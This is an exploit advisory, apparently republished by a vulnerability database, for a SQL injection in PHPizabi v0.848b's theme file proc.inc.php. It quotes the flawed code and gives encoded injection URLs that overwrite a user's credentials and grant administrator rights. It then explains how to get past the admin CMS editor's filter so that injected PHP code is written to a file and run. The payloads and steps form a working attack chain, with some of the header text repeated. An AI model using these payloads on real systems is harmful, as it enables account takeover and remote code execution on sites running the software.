PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)

2009-03-2400:00:00

vulners.com

2597

JSON

PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini
independent)
by Nine:Situations:Group::bookoo

our site: http://retrogod.altervista.org/
software site: http://www.phpizabi.net/

vulnerability:
sql injection in /theme/default/proc.inc.php

<?php

    function bufferProcParse&#40;$buffer&#41; {
            global $CONF;
            
            $tpl = new template;
            $tpl -&gt; LoadThis&#40;$buffer&#41;;
            // HANDLE POSTED NOTEPAD DATA

///////////////////////////////////////////////////////
if (isset($_GET["notepad_body"])) {
myQ("UPDATE `[x]users` SET `notepad_body` =
'".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'");
me("flush");
}
…

note urldecode() …

exploitation, manual:

injection urls:

change username and password of an existing user:
[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%

2527/*

grant yourself admin rights:
[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username =
'bookoo'/*
which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%

20%2527bookoo%2527/*

navigate:

http://host/path_to_phpizabi/?L=admin.index

boom !

now go to:

http://host/path_to_phpizabi/?L=admin.cms.edit&id={cms.file}

use this opening and closing tag style, example:

(it is always availiable, see:http://www.php.net/manual/en/language.basic-syntax.phpmode.php)
because of that preg_replace() in /modules/admin/cms/edit.php :

…
if (isset($_POST["Submit"])) {
if ($handle = fopen("modules/cms/{$_GET["id"]}.php", "w")) {

                    $body =
                            &quot;&lt;?php if &#40;!defined&#40;&#92;&quot;CORE_STRAP&#92;&quot;&#41;&#41; die&#40;&#41;; ?&gt;&#92;n&quot;
                            .preg_replace&#40;&#39;#&#40;&lt;&#92;&#92;?.*&#92;&#92;?&gt;&#41;|&#40;&lt;&#37;.*&#37;&gt;&#41;|&lt;&#92;&#92;?php|&lt;&#92;&#92;?|&#92;&#92;?&gt;|&lt;&#37;|&#37;&gt;#si&#39;,

NULL, stripslashes($_POST["body"][0]))
."\n<!-- Edited by ".me("username")." on
".date($CONF["LOCALE_HEADER_DATE_TIME"])." –>";
;

                    fwrite&#40;$handle, $body&#41;;
                    fclose&#40;$handle&#41;;

…

which is bypassed.

save changes and navigate:

http://host/path_to_phpizabi/?L=cms._cms_file_

to see the output…

now visit log page:

http://192.168.0.1/phpizabi/?L=admin.logs.logs

…

original url: http://retrogod.altervista.org/9sg_phpizabi_848bc1.html

JSON

PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation &#40;php.ini independent&#41;

PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent) by Nine:Situations:Group::bookoo

our site: http://retrogod.altervista.org/ software site: http://www.phpizabi.net/

…

PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)

PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini
independent)
by Nine:Situations:Group::bookoo

our site: http://retrogod.altervista.org/
software site: http://www.phpizabi.net/